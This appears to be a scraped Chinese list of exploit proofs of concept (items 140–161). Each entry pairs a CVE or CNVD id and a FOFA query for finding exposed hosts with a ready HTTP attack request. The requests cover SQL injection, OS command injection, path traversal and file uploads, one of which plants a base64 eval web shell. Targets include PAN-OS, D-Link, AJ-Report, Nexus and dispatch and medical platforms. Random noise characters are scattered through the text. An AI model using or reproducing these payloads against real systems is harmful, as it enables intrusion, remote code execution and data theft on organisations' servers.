User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 M. J7 }: L9 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( _/ c F9 c" b* b1 V6 n9 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 a1 Z2 j' h7 gAccept-Encoding: gzip, deflate, br
6 z. B& K! s5 WConnection: close& V' u: P. B" C( Q) V7 r7 o
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
9 K" p4 g$ {0 gUpgrade-Insecure-Requests: 18 s% r O$ n& L+ o2 g+ I% ]
* o( v% O* E4 f6 @+ w9 V) F4 r: z7 G' l9 b" e5 V8 K
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入1 w/ j5 G9 S8 [# F" ^
CVE-2024-2566
. [) \4 S( _$ M' m& m z- kFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 z; k1 z( b% m$ ]
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
4 I; q% r4 J5 W2 \/ N+ {Host: x.x.x.x9 O s$ ~+ _% r t1 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 W& U$ X# z% b' V* |! lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 `/ r$ G/ l$ ]) y, |6 r* J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! ]( ^0 C) H; ^% ]: _4 c
Accept-Encoding: gzip, deflate, br+ H7 x6 ]9 D# Q0 e( X
Connection: close" |) Y9 C/ A2 ~" S5 T, X, H& ~' X
Cookie: authcode=h8g95 N3 ?5 |9 o$ A, i0 w8 I" X7 o2 V
Upgrade-Insecure-Requests: 1
6 ^- I e, _: R+ s0 R" g5 I. h9 i+ K$ o- T" ~5 n, K
( c' }! O7 j- K- G) C1 j5 g" D* H
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入0 J: V! G+ U% H" D$ ~5 s" ^$ Q
FOFA:body="指挥调度管理平台"5 L# G) Z1 Z9 Q5 W, W3 [
POST /app/ext/ajax_users.php HTTP/1.1
+ y0 N$ u( n. q$ f# {" tHost: your-ip8 ?7 o0 C( \" {1 z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
( F$ j2 X0 i9 Z$ |) V3 Q6 eContent-Type: application/x-www-form-urlencoded% o' x! [# V/ Y
. q, j9 ^ B4 E% |1 P1 N' e/ W1 w' J% g# y& e; O3 l
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
8 N2 M, s) e( x* }3 {! j
9 t& y* n: D, m
: U' h- c3 g/ E) q142. CMSV6车辆监控平台系统中存在弱密码" z( ^- A* c+ ?2 T8 c9 E |1 x
CVE-2024-29666$ }# H/ B1 O9 K. D9 s5 @
FOFA:body="/808gps/"
# I. y( k# h4 E& z1 q) }& J9 Dadmin/admin
/ C# y* n' a6 K) l/ \6 F8 @143. Netis WF2780 v2.1.40144 远程命令执行
+ g) S7 A& P& ~# o4 FCVE-2024-25850: W6 [4 s1 e/ ~5 i- U
FOFA:title='AP setup' && header='netis'
: }0 ?8 U0 \$ B6 [PAYLOAD$ d/ z* ^8 L% P7 u
Y/ {5 L/ x, b7 S. q: D9 G& k144. D-Link nas_sharing.cgi 命令注入# y3 ?" J2 c: W& H) E
FOFA:app="D_Link-DNS-ShareCenter": b9 z! v0 `! l u
system参数用于传要执行的命令3 \; w! J7 N" y; h0 M
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
( r2 u9 x3 G; w& a" l* u8 n' PHost: x.x.x.x
, M0 Q7 {6 W. @! _9 s" zUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
3 `5 j. o& a0 eConnection: close
$ Z# B/ X; J* m3 t2 T# Z1 ZAccept: */*6 Y0 H2 x0 I. w$ R; |/ @
Accept-Language: en# z; Y& t7 F" t3 H3 O
Accept-Encoding: gzip0 w$ k6 Y# n8 {1 I: K. }
5 {0 |/ m' e) E4 W, a' [
: B: e% `0 e% V3 G9 `4 r% Y145. Palo Alto Networks PAN-OS GlobalProtect 命令注入7 q/ x: I7 p5 e* P
CVE-2024-3400. d! }* T( S7 l4 s. \5 Q. d4 o' a
FOFA:icon_hash="-631559155"3 x6 D& J8 j8 k" b/ g4 K/ ~; e9 ^' H
GET /global-protect/login.esp HTTP/1.1; `& K& M0 H( c* h" p% \2 X
Host: 192.168.30.112:1005. Y" w% @4 P% Y; t+ m/ M/ f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. _6 D- E# O2 ~" z1 d. S( ^3 V
Connection: close
# S+ p. T9 W5 L0 q( vCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
% e* c1 g# Y. g6 _. kAccept-Encoding: gzip f x, @1 _: K
i( B! y4 O3 O+ \" R
& t! E" O: g0 u! ~/ n/ D# ]7 K' E146. MajorDoMo thumb.php 未授权远程代码执行" p6 W* d2 z0 O. Q! T- l! }% m7 U
CNVD-2024-02175
" ?- u# t( ^+ D0 r. U( _! DFOFA:app="MajordomoSL"2 M' |6 O( S1 G5 e1 N& N/ ^
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
s3 O, S; Y% b/ U+ e" @& @: VHost: x.x.x.x
* p# H, g( F uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
+ E; J/ @/ ]; X8 a2 k HAccept-Charset: utf-8
3 e9 s& i5 K% i/ m% e* m" z. {$ MAccept-Encoding: gzip, deflate
/ C7 Y9 T, f$ u F, eConnection: close
* O( t" b6 C/ m, H% L
0 {) p( a* C3 ?9 L) t% ~4 S! S) Y! L. o. P# a% n( p' B% O
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
" W0 `8 g, F, C& qCVE-2024-32399
5 Y! ~/ C: p# n( @* cFOFA:body="RaidenMAILD"8 \4 V( v j# Q0 H
GET /webeditor/../../../windows/win.ini HTTP/1.1
/ C2 J; z; y( b5 o5 cHost: 127.0.0.1:81+ @) L, g2 T0 Y4 d5 Y' f
Cache-Control: max-age=0& B5 f# \+ J5 n/ u0 a1 F
Connection: close
, i# a, o1 H' r i; g4 v/ Y q* K( z( ]$ |
: @: Y0 _: V7 b9 A. _: W: y. i, _148. CrushFTP 认证绕过模板注入: c) {: o: ^' _. L
CVE-2024-4040
$ V. G; E3 }! Q6 |( u0 H& c, oFOFA:body="CrushFTP"$ T6 P1 i! C* R9 g
PAYLOAD" V) U* ?9 _1 l `$ O& I
h0 t t; b) G/ I U
149. AJ-Report开源数据大屏存在远程命令执行
3 }0 A. p j- r6 m* T% Z( j* Y" lFOFA:title="AJ-Report", e. E; f" ]! X% Y
: h2 Y* h! ?3 m0 r# k3 q1 g+ GPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1' u( H! p8 y) I9 W8 f$ q
Host: x.x.x.x1 j0 t% v! Q5 b4 q, N% e. D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 f6 T4 z$ K8 s) R( B/ \, W1 k( F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Y2 y U/ j4 s6 \) V7 @# U& U1 @2 CAccept-Encoding: gzip, deflate, br
A; f9 O h/ FAccept-Language: zh-CN,zh;q=0.9/ W; @4 v J8 R7 k* H! D
Content-Type: application/json;charset=UTF-81 A. L( R( u- F, k3 n, r5 Z8 u
Connection: close
! L% B, ]* f3 k+ e" z) J' g! B
7 z$ @; S5 e+ z7 X$ x7 [' r- @{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
3 |' V' P. z, g/ }
% G0 t# K6 ^& F* `( L& C, z$ j150. AJ-Report 1.4.0 认证绕过与远程代码执行
& s& _5 J: l O5 o2 nFOFA:title="AJ-Report"
3 D, c/ ~) d! hPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1: m+ N. w& Q$ M' K5 T, y
Host: x.x.x.x: m! V1 o4 K/ E+ U6 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' w2 a! R6 x2 R3 ]+ C- ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 y; A# C( E* g& o6 {# e- k. [* L
Accept-Encoding: gzip, deflate, br5 c P1 B' G: ^6 r) l7 _
Accept-Language: zh-CN,zh;q=0.9
. k% J2 j2 V: S6 rContent-Type: application/json;charset=UTF-8! @+ K+ V" Q) @! R6 ?' K7 d
Connection: close
/ E3 T7 E& c- n) DContent-Length: 339 s. B- A: h$ D) P
, V1 y9 ?& y1 ]' T{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
" Y: \# F* i# T9 M9 M K5 i9 e" X) b7 o/ G+ U+ _
( M; ]; P# X8 J0 K7 g151. AJ-Report 1.4.1 pageList sql注入
4 ^& S8 i- C! |; g( fFOFA:title="AJ-Report"' i; B9 ~" |2 ~3 W
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
) V7 } X" U5 j/ B2 O GHost: x.x.x.x
8 |6 G8 O2 R. D3 m' lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
[1 z$ z9 g9 i6 h9 F6 y0 h6 k. PConnection: close$ e/ x7 r. A3 i
Accept-Encoding: gzip9 P6 }- j4 q8 B7 S0 |
7 ?, B) J) f; z
; O. d3 D# Z' t152. Progress Kemp LoadMaster 远程命令执行
: N; o2 K" E" ^, e5 H) D+ _CVE-2024-1212
5 D. `! ?$ S' OLoadMaster <= 7.2.59.2 (GA)
$ k4 R: f1 H/ DLoadMaster<=7.2.54.8 (LTSF)
/ q5 v H/ s0 L$ LLoadMaster <= 7.2.48.10 (LTS)
4 `/ v' \9 P; H( g* x- W, PFOFA:body="LoadMaster" y8 P9 S5 {8 G4 u+ U: @; S
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
* i% D' F' X2 a6 }3 t, b" ]GET /access/set?param=enableapi&value=1 HTTP/1.1
1 |- P8 l, F# c+ uHost: x.x.x.x1 c" i" F. n: H0 O# Y# j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
: ^/ P( z; r. B, u/ K, k& D c$ nConnection: close
. o( T8 Y7 U, A( C" gAccept: */*. v# T( z0 W! d: r7 v4 n) ]! k( Y
Accept-Language: en% U: Z4 L$ g9 p- P
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
1 s: z2 E: G, _0 e2 P8 }' Z4 S4 QAccept-Encoding: gzip/ a) J! F D c
# D6 t- M3 ?' p4 Z8 ?2 D
1 I3 m; q4 k0 j7 i; \' }
153. gradio任意文件读取
5 Z& }6 ^' w* H }CVE-2024-1561FOFA:body="__gradio_mode__"
* z4 O" W; V! h2 p' Z$ d第一步,请求/config文件获取componets的id
9 X/ x+ Z/ f: l+ n P% x9 H( ]# o1 Qhttp://x.x.x.x/config* R, }. w5 a1 K
% p3 ^8 F9 ^/ |% N7 V- y
2 n' `' ]1 z+ o
第二步,将/etc/passwd的内容写入到一个临时文件
/ w* m+ t# R" f% n3 w' OPOST /component_server HTTP/1.1
; g: N2 s4 S/ r8 | MHost: x.x.x.x! A6 C$ `% v& {: `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
9 k: s# `6 ]9 ^8 J$ aConnection: close* q$ P5 \* x7 T
Content-Length: 115' p$ L: D2 q" o' u
Content-Type: application/json
+ O; P5 n# {1 s) {Accept-Encoding: gzip
0 V/ j. c: O$ {7 ^% Q! V5 W) h/ ]% L( P# W1 ~& Q5 E" V6 K
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}) z6 C+ S9 Z: c4 n
& [* [7 @$ B Y; ^
* G% X" r; a: |4 `0 X/ d
第三步访问
% {; I6 N2 G. }1 E' i& {' r' U6 thttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
! Y5 H6 c! o( Y* r; C
A' ?; ?3 {2 y' Z1 D. n0 q3 G' l0 P) L5 X
154. 天维尔消防救援作战调度平台 SQL注入) U" Q9 N8 Y) S9 ]& I; i+ |
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
* n& m: q2 }+ Z# y9 uPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
) O# L5 T& W* X( ]& ]; NHost: x.x.x.x- z) R- e$ \/ G7 k7 v- f5 S3 L' g. Y: V
Content-Length: 106
- W) B$ q; l" i# BCache-Control: max-age=0* ^) D$ V0 C- u) r1 u
Upgrade-Insecure-Requests: 1
: E) ?: P( r6 q4 h+ xOrigin: http://x.x.x.x; v+ H1 c% n* Q" l& {
Content-Type: application/json/ C9 }# }$ }, Q' ~. P3 E5 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 b1 k4 |, y- f/ y! {: n, nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 Y/ }' k. j3 L! l. j. R: @Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page1 s; ~" a0 R: a- o: J' p0 M. J
Accept-Encoding: gzip, deflate
. b' T: T# S/ [7 ]) uAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.70 F6 R1 F2 P i5 M1 S0 F a7 X4 W
Connection: close) Z$ Z9 g# m- U) k6 k7 z' k
$ {* V( A) P6 [) a* |% f
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
6 _" B N2 M5 D% o& V; f f6 D! u8 m+ F0 N6 S
- `, P4 \* L: r# Z4 B
155. 六零导航页 file.php 任意文件上传
% V0 L: R+ t: ?+ x5 V/ K) sCVE-2024-349829 _5 }' U* ~+ R' Z5 k4 X
FOFA:title=="上网导航 - LyLme Spage"
8 G" `1 B* W+ u( m$ m8 {POST /include/file.php HTTP/1.1) V6 U0 b! T; v
Host: x.x.x.x" x2 o5 h% z" ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0! |7 H% h" k! ^, G0 c6 c
Connection: close
+ q) [; K) I$ U' EContent-Length: 232. w( f0 K( X- `0 r( a$ t
Accept: application/json, text/javascript, */*; q=0.011 X7 {% V; Q% s: b6 k7 a
Accept-Encoding: gzip, deflate, br
$ y- P8 Y, ~4 g9 `; j9 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% ]8 d P2 |3 U0 g) x& G
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f4 W+ `4 V. Q& r1 v7 k
X-Requested-With: XMLHttpRequest! [% A7 b( R! k2 `3 p! [) l
4 t7 d1 ?" N9 d-----------------------------qttl7vemrsold314zg0f
1 b/ Y) E: b- I: m5 m0 j) w0 wContent-Disposition: form-data; name="file"; filename="test.php"" T# s M! |! Z @* T
Content-Type: image/png
# W4 ^1 C/ ?) G; `
# o# Y: g4 a* Q0 F( O<?php phpinfo();unlink(__FILE__);?># w# s- _" l u2 w, t( }
-----------------------------qttl7vemrsold314zg0f--
, X0 O% [* o; @- {) I
' X6 [* o3 G/ ~, b( L" y* I1 _9 `" N; y% q
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php) W5 b" }( a7 t3 \1 y9 E* S
2 Q$ D# y7 N: b9 D
156. TBK DVR-4104/DVR-4216 操作系统命令注入0 N% o n+ W* J) {4 I- C7 g! S
CVE-2024-3721# s7 c) {3 }. R: d3 J( b
FOFA:"Location: /login.rsp"! W" s" R; V- l
·TBK DVR-4104
1 @4 e ]2 ?5 Z: B& v; k·TBK DVR-42166 b* D! i. ~3 Z
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
9 R' p$ d% H1 w9 c7 d# I' b N. l; q* b
2 R* E* v9 H9 [: tPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- o" l T4 z- o2 e- H: n' {7 A# S
Host: x.x.x.x& Y) [ j% G! v2 i9 B
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 N1 Y& |8 K4 z, [3 h: [" |9 \0 b, W DConnection: close; M2 T5 u+ W3 x9 t6 n5 X7 }
Content-Length: 0& |6 U- T. A$ w5 r. D, Q. ^3 o
Cookie: uid=1
3 X3 f& y% v# K sAccept-Encoding: gzip' F4 Y. V+ \8 m$ |6 |
, x" L' k) q4 u6 }8 q1 x4 B( d d( S3 y# v- e* |1 U
157. 美特CRM upload.jsp 任意文件上传
( J' O3 q) |) l$ u4 B1 N+ iCNVD-2023-069713 D7 }7 _; E- S* O0 w+ ~9 X
FOFA:body="/common/scripts/basic.js"+ \- A P, @8 i6 K. H
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1' B2 x5 l! g* `9 Y+ D$ y, ?
Host: x.x.x.x1 j7 E5 s2 ^2 ~% J* D, J, ^8 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.369 T, D$ u+ K1 l) T5 s8 U
Content-Length: 709/ U4 T/ H+ m4 t. D' r2 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Y- Q, ~& q' yAccept-Encoding: gzip, deflate
' `1 I# w9 U/ u, r9 K3 w) WAccept-Language: zh-CN,zh;q=0.96 d3 Q! C5 v% w5 b% t* q$ A
Cache-Control: max-age=0/ e( { t$ k/ f- E* F+ f
Connection: close% @- f# j5 c5 b( ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN. H$ u% ^1 m6 L/ J1 z8 X
Upgrade-Insecure-Requests: 17 m, v/ k3 y! Z7 S7 Y4 c# r
- }7 a% G# S4 Z0 K8 D9 F% X9 C, d------WebKitFormBoundary1imovELzPsfzp5dN5 K1 z) R/ w9 H6 A! `1 |
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
: r, o( N& O8 @& y) NContent-Type: application/octet-stream1 t- W: S6 \7 C
6 J4 u2 q4 r7 h4 c$ h: x. j7 j3 ^# S
nyhelxrutzwhrsvsrafb
' A i2 u$ q4 T3 R------WebKitFormBoundary1imovELzPsfzp5dN3 I6 G p2 k4 I) |( c2 G' ?
Content-Disposition: form-data; name="key"
* h% K3 [& ~/ b4 J6 f# J3 B, [2 \5 y# n) m* ^8 Y2 x& _
null
' [! a1 A, s9 Y& ]; j------WebKitFormBoundary1imovELzPsfzp5dN
+ l, C1 d, f/ P" N& hContent-Disposition: form-data; name="form"
& [9 O b7 s+ t7 q: G* I' u; {$ j' Z. c! I+ \# P, {
null0 n% b8 E& Z- C
------WebKitFormBoundary1imovELzPsfzp5dN
+ M1 B, `7 Z; C( y# E" a0 rContent-Disposition: form-data; name="field"
1 t# L l& E7 w) N( e* K# i0 O% F+ i$ Q: |3 [" x
null5 \; e) @$ r3 D) F5 f* n! `7 S
------WebKitFormBoundary1imovELzPsfzp5dN* Z/ S: @3 E3 T5 R! @ r
Content-Disposition: form-data; name="filetitile". I2 L5 e! B$ B. [4 }; g) m' w
& i" \$ D3 }9 f5 V, t. G' a
null [+ k6 Z0 b4 h# I
------WebKitFormBoundary1imovELzPsfzp5dN
# N* d4 r" B' _( DContent-Disposition: form-data; name="filefolder"6 `$ b H1 v4 u$ h2 g6 B
$ g; k: N% x w4 w
null- A* d5 x9 K3 S4 x' N& @( V
------WebKitFormBoundary1imovELzPsfzp5dN--6 n2 W9 r2 j8 F" }, ]# L0 c# [( m
2 H/ L' g( L- E% m
1 i& ~. o3 `. Yhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
1 M b% x( M$ T* y4 `) \- b
; p q0 I- V# j! Z158. Mura-CMS-processAsyncObject存在SQL注入
/ J; @8 G/ s. i7 `! GCVE-2024-32640 z' f& ?# ]! g& B: m2 O1 z
FOFA:"Generator: Masa CMS"
- ~; N$ s- P3 k( k0 ^9 x/ a4 FPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
* p$ W* \% J/ o" E& \7 p" p; NHost: {{Hostname}}2 f5 n% o+ l! r0 X$ S! h* m: G
Content-Type: application/x-www-form-urlencoded. Y( U; h6 \9 l
: b3 E, g& ~( _+ Z) T0 N- w% E
object=displayregion&contenthistid=x\'&previewid=1
# T9 }1 o t3 S+ ^( \3 n5 T! c7 @7 K0 D8 d7 w7 b* l% e) k+ `; p
: j' N1 m& s2 j159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传+ z6 ~4 r0 _" G5 ~5 J! L
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
) I( f& s( G) c& U. z* R: @POST /webservices/WebJobUpload.asmx HTTP/1.1" L2 _/ Y3 p6 E* U4 q/ z5 B
Host: x.x.x.x4 o6 [ _# X4 q; Q) H6 o( X% d. v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36* _6 p0 ]6 g/ U; v/ w
Content-Length: 10803 M8 l# W8 I, k8 l' F) G6 O, x9 r
Accept-Encoding: gzip, deflate) f1 Z- j' K* _' K& A1 R
Connection: close* G, c/ b( f0 U7 Z2 r) z& u
Content-Type: text/xml; charset=utf-8
3 F, ~* {3 F! E" k& SSoapaction: "http://rainier/jobUpload") `! G$ I& t2 v4 \* a8 D2 V
, y( D% s j. [/ `( D+ x- r<?xml version="1.0" encoding="utf-8"?>
" s' Z2 z: a0 j+ }$ ]. Y& }3 v' D$ U<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; }- P# O; f, ^0 G# t. T" B<soap:Body>
3 H+ a$ q; p9 I: \6 Y! y<jobUpload xmlns="http://rainier">
2 t- m6 i9 u+ m1 _8 q' L9 D {& ~<vcode>1</vcode>
8 ]9 P& m3 o$ z0 Y5 ] r<subFolder></subFolder># o K" b' U' }$ w* E$ I2 O, n
<fileName>abcrce.asmx</fileName>
" ]) p, ^9 |- r9 I<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
x) c; _& V$ d5 f, b1 d* l/ R</jobUpload>
: N' [+ c, u% B</soap:Body>
1 E' ?3 y e. q7 [2 i( U; p</soap:Envelope>2 V2 b& R1 _7 [
* f& w0 S7 o4 G/ t2 z8 q+ W" B0 L8 I4 f; ^* Z& g# {5 G
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
- c/ A7 `" H" s0 G
4 M" X7 m, n7 x& t
9 b' N4 p% H! D. v3 C2 ~/ W9 C160. Sonatype Nexus Repository 3目录遍历与文件读取 k3 y! E1 }* x+ h, S8 u1 {
CVE-2024-4956
" V. [7 G5 z* H0 q: q4 {FOFA:title="Nexus Repository Manager"
E# c% }8 v3 XGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
4 W2 o/ M$ b: v/ O# c- ]Host: x.x.x.x: q, @- w3 L) B# Q/ j( D
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.02 }. ?5 C' T( N6 [) x$ \
Connection: close
% y$ D& @, E: eAccept: */*
5 f# k! a+ f5 d8 \Accept-Language: en/ n0 C# _& ?) U
Accept-Encoding: gzip. r+ }4 v f9 c; R5 E
! f+ Z0 @* o9 k# i6 y
( T" w* O* @9 S0 i _' A1 J- e161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
6 W3 J- w- Q- e7 yFOFA:body="/KT_Css/qd_defaul.css"0 W0 s0 o/ Z" z& U* d; d% a
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
8 n: g& E/ ^! QPOST /Webservice.asmx HTTP/1.11 J8 b& b) D# F6 Y
Host: x.x.x.x9 U5 I2 d; C' `- v# `( m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
' |8 R; C: S) n9 QConnection: close
% i; n& W7 {# I+ Z1 n5 ~. YContent-Length: 445
" |3 U3 }* t$ d" j4 _% `, VContent-Type: text/xml9 d* q1 ^; Y0 | m
Accept-Encoding: gzip
5 v* Q% m K. {0 H8 S3 B/ o$ {3 _ l
* P$ f* p3 E+ L& O* Q: \<?xml version="1.0" encoding="utf-8"?>0 I9 v/ f! S C$ j
<soap:Envelope xmlns:xsi="' y) W; N% p R; x/ @
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
( N3 \$ V; t% o/ R8 j: b0 G& Yxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% [ k0 A6 h3 s0 W; j# |( b<soap:Body>" ]- \% S9 e* H( D( _
<UploadResume xmlns="http://tempuri.org/">
+ P! v5 ~! ?9 t: c; a# m<ip>1</ip>; D" {! |4 A2 V1 ~' Z) `( C
<fileName>../../../../dizxdell.aspx</fileName>
( ?2 k. B$ Y$ ~5 A& T1 ^. u; U<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
3 Z! P+ p# p) G. n6 A<tag>3</tag>$ c$ g; R! ~* e, c% Z3 R6 N& I* ^
</UploadResume>
